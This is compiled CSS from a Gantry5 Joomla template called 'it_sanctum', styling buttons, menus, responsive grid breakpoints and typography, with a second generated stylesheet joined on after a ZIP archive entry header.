/* line 217, templates/it_sanctum/scss/sanctum/_particle-overrides.scss */
.g-onepage-menu ul li a {
  padding: 1rem;
}
/* line 219, templates/it_sanctum/scss/sanctum/_particle-overrides.scss */
.g-onepage-menu ul li a:hover {
  color: #fff;
  background: #4f953b;
}
/* line 224, templates/it_sanctum/scss/sanctum/_particle-overrides.scss */
/* line 225, templates/it_sanctum/scss/sanctum/_particle-overrides.scss */
.g-onepage-menu ul li:first-child a {
  border-top-left-radius: 0;
  border-top-right-radius: 0;
}
/* line 229, templates/it_sanctum/scss/sanctum/_particle-overrides.scss */
/* line 230, templates/it_sanctum/scss/sanctum/_particle-overrides.scss */
.g-onepage-menu ul li:last-child a {
  border-bottom-left-radius: 0;
  border-bottom-right-radius: 0;
}
/* line 234, templates/it_sanctum/scss/sanctum/_particle-overrides.scss */
/* line 235, templates/it_sanctum/scss/sanctum/_particle-overrides.scss */
.g-onepage-menu ul li.uk-active > a {
  color: #fff;
  background: #4f953b;
}
/* line 241, templates/it_sanctum/scss/sanctum/_particle-overrides.scss */
/* line 242, templates/it_sanctum/scss/sanctum/_particle-overrides.scss */
/* line 243, templates/it_sanctum/scss/sanctum/_particle-overrides.scss */
.g-onepage-menu ul .submenu li a {
  border-radius: 0;
  padding: 1rem;
}
/* line 252, templates/it_sanctum/scss/sanctum/_particle-overrides.scss */
/* line 253, templates/it_sanctum/scss/sanctum/_particle-overrides.scss */
/* line 254, templates/it_sanctum/scss/sanctum/_particle-overrides.scss */
.g-portfolio .g-portfolio-filter.uk-subnav-pill > * > * {
  border-radius: 0;
}
/* line 258, templates/it_sanctum/scss/sanctum/_particle-overrides.scss */
/* line 259, templates/it_sanctum/scss/sanctum/_particle-overrides.scss */
/* line 260, templates/it_sanctum/scss/sanctum/_particle-overrides.scss */
.g-portfolio .g-portfolio-item .g-portfolio-image .uk-overlay-background {
  background: rgba(79, 149, 59, 0.5);
  border: 20px solid #fff;
}
/* line 268, templates/it_sanctum/scss/sanctum/_particle-overrides.scss */
/* line 270, templates/it_sanctum/scss/sanctum/_particle-overrides.scss */
/* line 271, templates/it_sanctum/scss/sanctum/_particle-overrides.scss */
body .offcanvas-toggle-particle.g-offcanvas-toggle {
  color: #008056;
}
/* line 273, templates/it_sanctum/scss/sanctum/_particle-overrides.scss */
body .offcanvas-toggle-particle.g-offcanvas-toggle:hover {
  color: #4f953b;
}
/* line 2, templates/it_sanctum/scss/sanctum/_bs-buttons.scss */
/* line 3, templates/it_sanctum/scss/sanctum/_bs-buttons.scss */
#g-page-surround .btn, #g-offcanvas .btn {
  display: inline-block;
  padding: 0.5rem 1rem;
  border-radius: 0;
  color: #959595;
  background: transparent;
  border: 1px solid #bbb;
  line-height: 1.5;
  font-size: 0.9rem;
  vertical-align: middle;
  text-shadow: none;
  box-shadow: none;
  text-align: center;
  -webkit-transition: all 0.2s;
  -moz-transition: all 0.2s;
  transition: all 0.2s;
}
/* line 17, templates/it_sanctum/scss/sanctum/_bs-buttons.scss */
#g-page-surround .btn:hover, #g-offcanvas .btn:hover {
  background: #959595;
  color: #fff;
  border-color: #959595;
}
/* line 22, templates/it_sanctum/scss/sanctum/_bs-buttons.scss */
#g-page-surround .btn:active, #g-offcanvas .btn:active, #g-page-surround .btn:focus, #g-offcanvas .btn:focus {
  background: #959595;
  color: #fff;
}
/* line 26, templates/it_sanctum/scss/sanctum/_bs-buttons.scss */
#g-page-surround .btn.btn-primary, #g-offcanvas .btn.btn-primary {
  color: #fff;
  background: #4f953b;
  border: 1px solid #4f953b;
}
/* line 30, templates/it_sanctum/scss/sanctum/_bs-buttons.scss */
#g-page-surround .btn.btn-primary:hover, #g-offcanvas .btn.btn-primary:hover, #g-page-surround .btn.btn-primary:active, #g-offcanvas .btn.btn-primary:active, #g-page-surround .btn.btn-primary:focus, #g-offcanvas .btn.btn-primary:focus {
  background: #282828;
  color: #fff;
  border: 1px solid #282828;
}
/* line 36, templates/it_sanctum/scss/sanctum/_bs-buttons.scss */
#g-page-surround .btn.btn-info, #g-offcanvas .btn.btn-info {
  color: #fff;
  background: #5bc0de;
  border-color: #5bc0de;
}
/* line 40, templates/it_sanctum/scss/sanctum/_bs-buttons.scss */
#g-page-surround .btn.btn-info:hover, #g-offcanvas .btn.btn-info:hover, #g-page-surround .btn.btn-info:active, #g-offcanvas .btn.btn-info:active, #g-page-surround .btn.btn-info:focus, #g-offcanvas .btn.btn-info:focus {
  background: #85d0e7;
  border-color: #85d0e7;
}
/* line 45, templates/it_sanctum/scss/sanctum/_bs-buttons.scss */
#g-page-surround .btn.btn-success, #g-offcanvas .btn.btn-success {
  color: #fff;
  background: #2ecc71;
  border-color: #2ecc71;
}
/* line 49, templates/it_sanctum/scss/sanctum/_bs-buttons.scss */
#g-page-surround .btn.btn-success:hover, #g-offcanvas .btn.btn-success:hover, #g-page-surround .btn.btn-success:active, #g-offcanvas .btn.btn-success:active, #g-page-surround .btn.btn-success:focus, #g-offcanvas .btn.btn-success:focus {
  background: #54d98c;
  border-color: #54d98c;
}
/* line 54, templates/it_sanctum/scss/sanctum/_bs-buttons.scss */
#g-page-surround .btn.btn-warning, #g-offcanvas .btn.btn-warning {
  color: #fff;
  background: #f39c12;
  border-color: #f39c12;
}
/* line 58, templates/it_sanctum/scss/sanctum/_bs-buttons.scss */
#g-page-surround .btn.btn-warning:hover, #g-offcanvas .btn.btn-warning:hover, #g-page-surround .btn.btn-warning:active, #g-offcanvas .btn.btn-warning:active, #g-page-surround .btn.btn-warning:focus, #g-offcanvas .btn.btn-warning:focus {
  background: #f5b043;
  border-color: #f5b043;
}
/* line 63, templates/it_sanctum/scss/sanctum/_bs-buttons.scss */
#g-page-surround .btn.btn-danger, #g-offcanvas .btn.btn-danger {
  color: #fff;
  background: #c0392b;
  border-color: #c0392b;
}
/* line 67, templates/it_sanctum/scss/sanctum/_bs-buttons.scss */
#g-page-surround .btn.btn-danger:hover, #g-offcanvas .btn.btn-danger:hover, #g-page-surround .btn.btn-danger:active, #g-offcanvas .btn.btn-danger:active, #g-page-surround .btn.btn-danger:focus, #g-offcanvas .btn.btn-danger:focus {
  background: #d65548;
  border-color: #d65548;
}
/* line 72, templates/it_sanctum/scss/sanctum/_bs-buttons.scss */
#g-page-surround .btn.btn-inverse, #g-offcanvas .btn.btn-inverse {
  color: #fff;
  background: #2c3e50;
  border-color: #2c3e50;
}
/* line 76, templates/it_sanctum/scss/sanctum/_bs-buttons.scss */
#g-page-surround .btn.btn-inverse:hover, #g-offcanvas .btn.btn-inverse:hover, #g-page-surround .btn.btn-inverse:active, #g-offcanvas .btn.btn-inverse:active, #g-page-surround .btn.btn-inverse:focus, #g-offcanvas .btn.btn-inverse:focus {
  background: #3e5871;
  border-color: #3e5871;
}
/* line 81, templates/it_sanctum/scss/sanctum/_bs-buttons.scss */
#g-page-surround .btn.btn-link, #g-offcanvas .btn.btn-link {
  color: #4f953b;
  background: transparent;
  border: none;
  padding: initial;
}
/* line 86, templates/it_sanctum/scss/sanctum/_bs-buttons.scss */
#g-page-surround .btn.btn-link:hover, #g-offcanvas .btn.btn-link:hover, #g-page-surround .btn.btn-link:active, #g-offcanvas .btn.btn-link:active, #g-page-surround .btn.btn-link:focus, #g-offcanvas .btn.btn-link:focus {
  color: #325e25;
}
/* line 90, templates/it_sanctum/scss/sanctum/_bs-buttons.scss */
#g-page-surround .btn.btn-large, #g-offcanvas .btn.btn-large {
  font-size: 1.125rem;
  padding: 0.8rem 1.3rem;
}
/* line 96, templates/it_sanctum/scss/sanctum/_bs-buttons.scss */
/* line 97, templates/it_sanctum/scss/sanctum/_bs-buttons.scss */
#g-page-surround .btn-group > .btn, #g-offcanvas .btn-group > .btn {
  border-radius: 0;
}
/* line 100, templates/it_sanctum/scss/sanctum/_bs-buttons.scss */
#g-page-surround .btn-group > .btn:first-child, #g-offcanvas .btn-group > .btn:first-child {
  border-bottom-left-radius: 0;
  border-top-left-radius: 0;
}
/* line 103, templates/it_sanctum/scss/sanctum/_bs-buttons.scss */
#g-page-surround .btn-group > .btn:last-child, #g-offcanvas .btn-group > .btn:last-child {
  border-bottom-right-radius: 0;
  border-top-right-radius: 0;
}
/* line 109, templates/it_sanctum/scss/sanctum/_bs-buttons.scss */
/* line 110, templates/it_sanctum/scss/sanctum/_bs-buttons.scss */
#g-page-surround .readmore .btn, #g-offcanvas .readmore .btn, #g-page-surround .search-form-results .btn, #g-offcanvas .search-form-results .btn {
  background: #4f953b;
  color: #fff;
  border: none;
  -webkit-transition: background 0.2s;
  -moz-transition: background 0.2s;
  transition: background 0.2s;
}
/* line 115, templates/it_sanctum/scss/sanctum/_bs-buttons.scss */
#g-page-surround .readmore .btn:hover, #g-offcanvas .readmore .btn:hover, #g-page-surround .search-form-results .btn:hover, #g-offcanvas .search-form-results .btn:hover, #g-page-surround .readmore .btn:active, #g-offcanvas .readmore .btn:active, #g-page-surround .search-form-results .btn:active, #g-offcanvas .search-form-results .btn:active, #g-page-surround .readmore .btn:focus, #g-offcanvas .readmore .btn:focus, #g-page-surround .search-form-results .btn:focus, #g-offcanvas .search-form-results .btn:focus {
  background: #282828;
  color: #fff;
}
/* line 121, templates/it_sanctum/scss/sanctum/_bs-buttons.scss */
/* line 122, templates/it_sanctum/scss/sanctum/_bs-buttons.scss */
#g-page-surround .search-form-results .btn, #g-offcanvas .search-form-results .btn {
  line-height: 1.5;
}
/* line 2, media/gantry5/engines/nucleus/scss/nucleus/theme/breakpoints/_flex.scss */
.g-container {
  width: 75rem;
}
@media only all and (min-width: 60rem) and (max-width: 74.938rem) {
  .g-container {
    width: 60rem;
  }
}
@media only all and (min-width: 48rem) and (max-width: 59.938rem) {
  .g-container {
    width: 48rem;
  }
}
@media only all and (min-width: 30.062rem) and (max-width: 47.938rem) {
  .g-container {
    width: 30rem;
  }
}
@media only all and (max-width: 30rem) {
  .g-container {
    width: 100%;
  }
}
/* line 17, media/gantry5/engines/nucleus/scss/nucleus/theme/breakpoints/_flex.scss */
.g-container.g-flushed {
  width: 100%;
}
/* line 23, media/gantry5/engines/nucleus/scss/nucleus/theme/breakpoints/_flex.scss */
@media only all and (max-width: 47.938rem) {
  .g-block {
    -webkit-flex-grow: 0;
    -moz-flex-grow: 0;
    flex-grow: 0;
    -ms-flex-positive: 0;
    -webkit-flex-basis: 100%;
    -moz-flex-basis: 100%;
    flex-basis: 100%;
    -ms-flex-preferred-size: 100%;
  }
}
/* line 30, media/gantry5/engines/nucleus/scss/nucleus/theme/breakpoints/_flex.scss */
@media only all and (max-width: 47.938rem) {
  body [class*="size-"] {
    -webkit-flex-grow: 0;
    -moz-flex-grow: 0;
    flex-grow: 0;
    -ms-flex-positive: 0;
    -webkit-flex-basis: 100%;
    -moz-flex-basis: 100%;
    flex-basis: 100%;
    -ms-flex-preferred-size: 100%;
    max-width: 100%;
  }
}
@media only all and (max-width: 47.938rem) {
  @supports not (flex-wrap: wrap) {
    /* line 41, media/gantry5/engines/nucleus/scss/nucleus/theme/breakpoints/_flex.scss */
    .g-grid {
      display: block;
      -webkit-box-lines: inherit;
      -moz-box-lines: inherit;
      box-lines: inherit;
      -webkit-flex-wrap: inherit;
      -moz-flex-wrap: inherit;
      -ms-flex-wrap: inherit;
      flex-wrap: inherit;
    }
    /* line 45, media/gantry5/engines/nucleus/scss/nucleus/theme/breakpoints/_flex.scss */
    .g-block {
      display: block;
      -webkit-box-flex: inherit;
      -moz-box-flex: inherit;
      box-flex: inherit;
      -webkit-flex: inherit;
      -moz-flex: inherit;
      -ms-flex: inherit;
      flex: inherit;
    }
  }
}
/* line 2, media/gantry5/engines/nucleus/scss/nucleus/theme/breakpoints/_utilities.scss */
.visible-large, .visible-desktop, .visible-tablet, .visible-phone, .g-block.visible-large, .g-block.visible-desktop, .g-block.visible-tablet, .g-block.visible-phone {
  display: none !important;
}
@media only all and (max-width: 47.938rem) {
  /* line 14, media/gantry5/engines/nucleus/scss/nucleus/theme/breakpoints/_utilities.scss */
  .visible-phone {
    display: block !important;
  }
  /* line 17, media/gantry5/engines/nucleus/scss/nucleus/theme/breakpoints/_utilities.scss */
  .g-block.visible-phone {
    display: block !important;
  }
}
@media only all and (min-width: 48rem) and (max-width: 59.938rem) {
  /* line 23, media/gantry5/engines/nucleus/scss/nucleus/theme/breakpoints/_utilities.scss */
  .visible-tablet {
    display: block !important;
  }
  /* line 26, media/gantry5/engines/nucleus/scss/nucleus/theme/breakpoints/_utilities.scss */
  .g-block.visible-tablet {
    display: block !important;
  }
}
@media only all and (min-width: 60rem) and (max-width: 74.938rem) {
  /* line 32, media/gantry5/engines/nucleus/scss/nucleus/theme/breakpoints/_utilities.scss */
  .visible-desktop {
    display: block !important;
  }
  /* line 35, media/gantry5/engines/nucleus/scss/nucleus/theme/breakpoints/_utilities.scss */
  .g-block.visible-desktop {
    display: block !important;
  }
}
@media only all and (min-width: 75rem) {
  /* line 41, media/gantry5/engines/nucleus/scss/nucleus/theme/breakpoints/_utilities.scss */
  .visible-large {
    display: block !important;
  }
  /* line 44, media/gantry5/engines/nucleus/scss/nucleus/theme/breakpoints/_utilities.scss */
  .g-block.visible-large {
    display: block !important;
  }
  /* line 47, media/gantry5/engines/nucleus/scss/nucleus/theme/breakpoints/_utilities.scss */
  .visible-desktop {
    display: block !important;
  }
  /* line 50, media/gantry5/engines/nucleus/scss/nucleus/theme/breakpoints/_utilities.scss */
  .g-block.visible-desktop {
    display: block !important;
  }
}
@media only all and (max-width: 47.938rem) {
  /* line 57, media/gantry5/engines/nucleus/scss/nucleus/theme/breakpoints/_utilities.scss */
  .hidden-phone {
    display: none !important;
  }
}
@media only all and (min-width: 48rem) and (max-width: 59.938rem) {
  /* line 63, media/gantry5/engines/nucleus/scss/nucleus/theme/breakpoints/_utilities.scss */
  .hidden-tablet {
    display: none !important;
  }
}
@media only all and (min-width: 60rem) and (max-width: 74.938rem) {
  /* line 69, media/gantry5/engines/nucleus/scss/nucleus/theme/breakpoints/_utilities.scss */
  .hidden-desktop {
    display: none !important;
  }
}
@media only all and (min-width: 75rem) {
  /* line 75, media/gantry5/engines/nucleus/scss/nucleus/theme/breakpoints/_utilities.scss */
  .hidden-large {
    display: none !important;
  }
  /* line 78, media/gantry5/engines/nucleus/scss/nucleus/theme/breakpoints/_utilities.scss */
  .hidden-desktop {
    display: none !important;
  }
}
@media only all and (max-width: 47.938rem) {
  /* line 85, media/gantry5/engines/nucleus/scss/nucleus/theme/breakpoints/_utilities.scss */
  .align-right {
    text-align: inherit !important;
  }
  /* line 88, media/gantry5/engines/nucleus/scss/nucleus/theme/breakpoints/_utilities.scss */
  .align-left {
    text-align: inherit !important;
  }
}
/*# sourceMappingURL=sanctum__body_only.css.map */PK!�ɷ;�?�?1it_sanctum/custom/css-compiled/sanctum__error.cssnu&1i�/* GANTRY5 DEVELOPMENT MODE ENABLED.
 *
 * WARNING: This file is automatically generated by Gantry5. Any modifications to this file will be lost!
 *
 * For more information on modifying CSS, please read:
 *
 * http://docs.gantry.org/gantry5/configure/styles
 * http://docs.gantry.org/gantry5/tutorials/adding-a-custom-style-sheet
 */

@charset "UTF-8";
@import url('//fonts.googleapis.com/css?family=Lato');
@import url('//fonts.googleapis.com/css?family=Cormorant+SC');
.g-content {
  margin: 0.625rem;
  padding: 0.938rem;
}
.g-flushed .g-content {
  margin: 0;
  padding: 0;
}
body {
  font-size: 1rem;
  line-height: 1.5;
}
h1 {
  font-size: 2.7rem;
}
h2 {
  font-size: 2.07rem;
}
h3 {
  font-size: 1.8rem;
}
h4 {
  font-size: 1.35rem;
}
h5 {
  font-size: 0.9rem;
}
h6 {
  font-size: 0.81rem;
}
small {
  font-size: 0.875rem;
}
cite {
  font-size: 0.875rem;
}
sub, sup {
  font-size: 0.75rem;
}
code, kbd, pre, samp {
  font-size: 1rem;
  font-family: "Menlo", "Monaco", monospace;
}
textarea, select[multiple=multiple], input[type="color"], input[type="date"], input[type="datetime"], input[type="datetime-local"], input[type="email"], input[type="month"], input[type="number"], input[type="password"], input[type="search"], input[type="tel"], input[type="text"], input[type="time"], input[type="url"], input[type="week"], input:not([type]) {
  border-radius: 0;
}
body, #g-page-surround {
  color: #959595;
  background-color: #ffffff;
  -webkit-font-smoothing: antialiased;
  -moz-osx-font-smoothing: grayscale;
}
#g-page-surround {
  box-shadow: 0 0 15px rgba(0, 0, 0, 0.4);
}
@media print {
  #g-page-surround {
    background: #fff !important;
    color: #000 !important;
  }
}
a {
  color: #4f953b;
  -webkit-transition: color 0.2s;
  -moz-transition: color 0.2s;
  transition: color 0.2s;
}
a:hover {
  color: #325e25;
}
h1, h2, h3, h4, h5, h6, strong {
  color: #282828;
}
.button {
  display: inline-block;
  padding: 0.5rem 1rem;
  border-radius: 0;
  background: #4f953b;
  color: #ffffff;
  border: 1px solid #4f953b;
  line-height: 1.5;
  font-size: 0.9rem;
  vertical-align: middle;
  text-shadow: none;
  box-shadow: none;
  text-align: center;
  -webkit-transition: background 0.2s;
  -moz-transition: background 0.2s;
  transition: background 0.2s;
}
.button:hover {
  color: #ffffff;
  background: #40782f;
}
.button:active, .button:focus {
  color: #ffffff;
  background: #437f32;
}
.button.dark {
  background: #282828;
  border: 1px solid #282828;
}
.button.dark:hover, .button.dark:active, .button.dark:focus {
  background: #474747;
}
.button.empty {
  background: none;
  border: 1px solid #4f953b;
  color: #4f953b;
  -webkit-transition: all 0.2s;
  -moz-transition: all 0.2s;
  transition: all 0.2s;
}
.button.empty:hover {
  color: #ffffff;
  background: #4f953b;
}
.button.button-grey {
  background: #a8a8a8;
  color: #ffffff;
  border: 1px solid #a8a8a8;
}
.button.button-grey:hover {
  background: #999;
  border: 1px solid #999;
}
.button.button-green {
  background: #4f953b;
  border: 1px solid #4f953b;
}
.button.button-green:hover {
  background: #437f32;
  border: 1px solid #437f32;
}
.button.button-orange {
  background: #f26d5b;
  border: 1px solid #f26d5b;
}
.button.button-orange:hover {
  background: #f0543f;
  border: 1px solid #f26d5b;
}
.button.button-purple {
  background: #8283a7;
  border: 1px solid #8283a7;
}
.button.button-purple:hover {
  background: #70719a;
  border: 1px solid #70719a;
}
.button.button-blue {
  background: #2b90d9;
  border: 1px solid #2b90d9;
}
.button.button-blue:hover {
  background: #2380c3;
  border: 1px solid #2380c3;
}
.button.button-xlarge {
  font-size: 1.4rem;
}
.button.button-large {
  font-size: 1.2rem;
}
.button.button-small {
  font-size: 0.8rem;
}
.button.button-xsmall {
  font-size: 0.7rem;
}
.button.button-block {
  display: block;
}
.g-title {
  margin-top: -5px;
  margin-bottom: 30px;
  position: relative;
}
.g-title:after {
  content: "";
  height: 1px;
  width: 70px;
  margin: 20px 0;
  display: block;
  background: #dddddd;
}
#g-offcanvas .g-title:before, #g-offcanvas .g-title:after, .g-particle-intro .g-title:before, .g-particle-intro .g-title:after {
  display: none;
}
#g-aside .g-title, #g-sidebar .g-title {
  font-size: 1.35rem;
  margin-top: 0;
  margin-bottom: 25px;
}
#g-aside .g-title:before, #g-aside .g-title:after, #g-sidebar .g-title:before, #g-sidebar .g-title:after {
  width: 60px;
}
@media only all and (min-width: 48rem) and (max-width: 59.99rem) {
  #g-aside .g-title:before, #g-aside .g-title:after, #g-sidebar .g-title:before, #g-sidebar .g-title:after {
    display: none;
  }
}
#g-aside .text-center .g-title:before, #g-aside .text-center .g-title:after, #g-aside .title-center .g-title:before, #g-aside .title-center .g-title:after, #g-sidebar .text-center .g-title:before, #g-sidebar .text-center .g-title:after, #g-sidebar .title-center .g-title:before, #g-sidebar .title-center .g-title:after {
  width: 40px;
}
#g-aside .g-content > div, #g-sidebar .g-content > div {
  margin-bottom: 50px;
}
#g-aside .g-content > div:last-child, #g-sidebar .g-content > div:last-child {
  margin-bottom: 0;
}
.border-bottom {
  border-bottom: 1px solid #dddddd;
}
.border-top {
  border-top: 1px solid #dddddd;
}
.g-logo {
  margin: 10px 0;
  display: inline-block;
}
.g-logo > .g-content {
  margin-top: 0;
  margin-bottom: 0;
}
@media only all and (max-width: 47.99rem) {
  .g-logo {
    display: block;
    text-align: center;
  }
}
.g-logo img {
  width: auto;
}
.logo-large {
  display: inline-block;
}
.g-gutter {
  margin-left: -0.938rem;
  margin-right: -0.938rem;
}
.g-gutter .g-content {
  margin: 0;
  padding-top: 0;
  padding-bottom: 0;
}
.fullwidth-section {
  padding: 0 !important;
}
.fullwidth-section > .g-container {
  width: 100%;
}
.fullwidth-section .g-content {
  padding: 0;
  margin: 0;
}
.g-center-vertical {
  display: -webkit-box;
  display: -moz-box;
  display: box;
  display: -webkit-flex;
  display: -moz-flex;
  display: -ms-flexbox;
  display: flex;
  -webkit-box-align: center;
  -moz-box-align: center;
  box-align: center;
  -webkit-align-items: center;
  -moz-align-items: center;
  -ms-align-items: center;
  -o-align-items: center;
  align-items: center;
  -ms-flex-align: center;
}
.tooltip h1, .tooltip h2, .tooltip h3, .tooltip h4, .tooltip h5, .tooltip h6, .tooltip strong {
  color: #ffffff !important;
}
.presets-demo .g-dropdown .g-menu-item-container:before {
  content: "";
  position: absolute;
  width: 20px;
  height: 20px;
  margin-top: 2px;
  border-radius: 0px;
  background: #000000;
  border: 1px solid #ffffff;
}
.presets-demo .g-dropdown .g-menu-item-container .g-menu-item-content {
  margin-left: 30px;
}
.presets-demo .g-dropdown .preset1 .g-menu-item-container:before {
  background: #c91f37;
}
.presets-demo .g-dropdown .preset2 .g-menu-item-container:before {
  background: #4f953b;
}
.presets-demo .g-dropdown .preset3 .g-menu-item-container:before {
  background: #f26d5b;
}
.presets-demo .g-dropdown .preset4 .g-menu-item-container:before {
  background: #8283a7;
}
.presets-demo .g-dropdown .preset5 .g-menu-item-container:before {
  background: #2b90d9;
}
.presets-demo .g-dropdown .preset6 .g-menu-item-container:before {
  background: #f2aa0f;
}
#g-mobilemenu-container .presets-demo .g-dropdown .g-go-back .g-menu-item-container:before {
  content: "";
  position: relative;
  width: 1.28571em;
  height: auto;
  margin-top: 0;
  border-radius: 0;
  background: none;
}
#g-mobilemenu-container .presets-demo .g-dropdown .g-go-back .g-menu-item-container .g-menu-item-content {
  margin-left: 30px;
}
.g-perso {
  font-family: "Lato";
  font-weight: 400;
  font-size: 0.9rem;
  color: #ffffff;
  background-color: #7ac572;
}
.g-perso-left {
  margin-bottom: 0;
  border-left: -20px solid white;
  background-color: #fff;
}
.g-image2 {
  background-image: url('//www.ptits-anes.fr/images/Demo/elements/story2.jpg');
  background-repeat: no-repeat;
  padding-left: 0px;
  padding-top: 0px;
}
.g-image3 {
  background-image: url('//www.ptits-anes.fr/images/Demo/elements/story3.jpg');
  background-repeat: no-repeat;
}
body {
  font-family: "Lato";
  font-weight: 400;
  font-size: 0.9rem;
}
h1, h2, h3, h4, h5, h6 {
  font-family: "Cormorant SC";
  font-weight: 500;
  margin-top: -5px;
}
h1 {
  font-size: 2.7rem;
}
h2 {
  font-size: 2.07rem;
}
h3 {
  font-size: 1.8rem;
}
h4 {
  font-size: 1.35rem;
}
h5 {
  font-size: 0.9rem;
}
h6 {
  font-size: 0.81rem;
}
.g-main-nav {
  font-family: "Cormorant SC";
  font-weight: 400;
  font-size: 1rem;
}
.g-main-nav .g-dropdown {
  font-size: 0.9rem;
}
bold, strong {
  font-weight: 700;
}
.button {
  font-weight: 500;
}
blockquote {
  border-left: 10px solid #F0F2F4;
}
blockquote p {
  font-size: 1rem;
  color: #c8c8c8;
  margin-bottom: 1rem !important;
}
blockquote cite {
  display: block;
  text-align: right;
  color: #959595;
  font-size: 1.1rem;
}
blockquote small:before {
  content: none !important;
}
code {
  background: #fafafa;
  color: #d05;
  font-size: 0.81rem;
  border: 1px solid #dddddd;
}
pre {
  padding: 1rem;
  margin: 2rem 0;
  background: #f8f8f8;
  border: 1px solid #dddddd;
  border-radius: 0;
  line-height: 1.15;
  font-size: 0.81rem;
  border: 1px solid #dddddd;
}
pre code {
  color: #237794;
  background: inherit;
  font-size: 0.81rem;
}
pre.prettyprint {
  border: 1px solid #dddddd !important;
  padding: 1rem !important;
}
hr {
  border-bottom: 1px solid #dddddd;
}
hr.uk-article-divider {
  border-color: #dddddd;
  margin-bottom: 35px;
}
* + .uk-article-divider {
  margin-top: 35px;
}
.uk-table-hover tbody tr:hover {
  background: #dddddd;
}
.uk-badge {
  margin-right: 5px;
}
.g-typography-page > section {
  margin-top: 150px;
}
.g-typography-page > section:first-child {
  margin-top: 0;
}
iframe {
  border: none;
}
.uk-accordion .uk-accordion-title {
  background: #dddddd;
  border: 1px solid #dddddd;
  border-radius: 3px;
}
.uk-tab-grid::before {
  border-color: #dddddd;
}
#g-navigation {
  background-color: #ffffff;
  color: #008056;
  text-align: center;
  position: relative;
  z-index: 1002;
}
#g-navigation h1, #g-navigation h2, #g-navigation h3, #g-navigation h4, #g-navigation h5, #g-navigation h6, #g-navigation strong {
  color: #959595;
}
#g-navigation > .g-container {
  position: relative;
}
#g-navigation .g-content {
  padding-top: 0;
  padding-bottom: 0;
  margin-top: 0;
  margin-bottom: 0;
}
#g-navigation.uk-active[data-uk-sticky] {
  box-shadow: 0 3px 3px rgba(0, 0, 0, 0.05);
}
.uk-sticky-placeholder #g-navigation .uk-active {
  box-shadow: 0 3px 3px rgba(0, 0, 0, 0.05);
}
#g-navigation .align-left .g-toplevel, #g-header .align-left .g-toplevel {
  justify-content: flex-start;
  -webkit-justify-content: flex-start;
}
#g-navigation .align-right .g-toplevel, #g-header .align-right .g-toplevel {
  justify-content: flex-end;
  -webkit-justify-content: flex-end;
}
@media print {
  #g-navigation {
    background: #fff !important;
    color: #000 !important;
  }
}
.g-main-nav .g-toplevel > li > .g-menu-item-container, .g-main-nav .g-sublevel > li > .g-menu-item-container {
  padding: 0.2345rem 0.469rem;
  white-space: nowrap;
  -webkit-transition: background 0.2s, color 0.2s;
  -moz-transition: background 0.2s, color 0.2s;
  transition: background 0.2s, color 0.2s;
}
.g-main-nav .g-standard .g-dropdown {
  width: 180px;
  float: left;
}
.g-main-nav {
  z-index: 20;
}
.g-main-nav:not(.g-menu-hastouch) .g-toplevel > li > .g-menu-item-container .g-menu-parent-indicator {
  display: none;
}
.g-main-nav:not(.g-menu-hastouch) .g-dropdown {
  z-index: 1003;
}
.g-main-nav .g-toplevel > li > .g-menu-item-container {
  line-height: 1;
}
.g-main-nav .g-toplevel > li > .g-menu-item-container > .g-menu-item-content {
  line-height: normal;
  text-align: center;
}
.g-main-nav .g-toplevel > li.g-parent .g-menu-parent-indicator:after {
  width: 1rem;
}
.g-main-nav .g-toplevel i {
  opacity: 1;
}
.g-main-nav .g-dropdown {
  text-align: left;
  border-radius: none;
}
.dir-rtl .g-main-nav .g-dropdown {
  text-align: right;
}
.g-main-nav .g-sublevel > li {
  margin: 0;
  padding: 0;
}
.g-main-nav .g-sublevel > li > .g-menu-item-container {
  font-weight: normal;
}
.g-main-nav .g-sublevel > li > .g-menu-item-container > .g-menu-item-content {
  vertical-align: middle;
}
.g-main-nav .g-sublevel > li.g-parent .g-menu-parent-indicator {
  right: 10px;
  top: 13px;
}
.g-main-nav .g-sublevel > li.g-parent .g-menu-parent-indicator:after {
  content: "";
  opacity: 0.75;
  font-size: 0.9rem;
}
.g-main-nav .g-sublevel > li:hover.g-parent .g-menu-parent-indicator:after {
  content: "" !important;
}
.g-main-nav .g-fullwidth > .g-dropdown {
  margin: 0 1.563rem;
}
.g-main-nav .g-fullwidth > .g-dropdown[data-g-item-width] {
  margin-left: 0;
  margin-right: 0;
}
@media (-ms-high-contrast: none), (-ms-high-contrast: active) {
  .g-main-nav .g-fullwidth > .g-dropdown > .g-dropdown-column > .g-grid {
    -webkit-flex-flow: row;
    -moz-flex-flow: row;
    flex-flow: row;
  }
}
.g-main-nav .g-fullwidth > .g-dropdown > .g-dropdown-column > .g-grid .g-block {
  border-right: 1px solid rgba(255, 255, 255, 0.1);
}
.g-main-nav .g-fullwidth > .g-dropdown > .g-dropdown-column > .g-grid .g-block:last-child {
  border-right: none;
}
.g-main-nav .g-fullwidth > .g-dropdown .g-sublevel > li:hover .g-menu-parent-indicator:after, .g-main-nav .g-fullwidth > .g-dropdown .g-sublevel > li.active .g-menu-parent-indicator:after {
  color: #008056;
  opacity: 1;
}
.g-main-nav .g-fullwidth > .g-dropdown .g-sublevel > li a {
  padding: 12px 20px !important;
}
.g-main-nav .g-fullwidth > .g-dropdown .g-sublevel .g-menu-parent-indicator {
  top: 10px !important;
}
.g-main-nav .g-fullwidth > .g-dropdown .g-sublevel .g-menu-parent-indicator:after {
  background: rgba(0, 0, 0, 0.99);
  color: #ffffff !important;
  border: 1px solid rgba(255, 255, 255, 0.3);
  border-radius: 4px;
  height: 1.5rem;
  width: 1.5rem !important;
  padding: 0.15rem;
  text-align: center;
  line-height: 18px;
  opacity: 1;
  -webkit-transition: all, 0.2s;
  -moz-transition: all, 0.2s;
  transition: all, 0.2s;
}
.g-main-nav .g-fullwidth > .g-dropdown .g-sublevel .g-menu-parent-indicator:hover:after {
  background: rgba(77, 77, 77, 0.99);
}
.g-menu-item-subtitle {
  opacity: 1;
}
.g-menu-overlay.g-menu-overlay-open {
  z-index: 19;
}
.g-main-nav .g-standard .g-dropdown .flyout-left .g-dropdown {
  left: auto;
  right: 100%;
}
.g-menu-hastouch .g-standard .g-toplevel > li.g-menu-item-link-parent > .g-menu-item-container > .g-menu-parent-indicator, .g-menu-hastouch .g-fullwidth .g-toplevel > li.g-menu-item-link-parent > .g-menu-item-container > .g-menu-parent-indicator {
  border-radius: 0;
  margin: -0.2rem 0 -0.2rem 0.5rem;
  padding: 0.2rem;
}
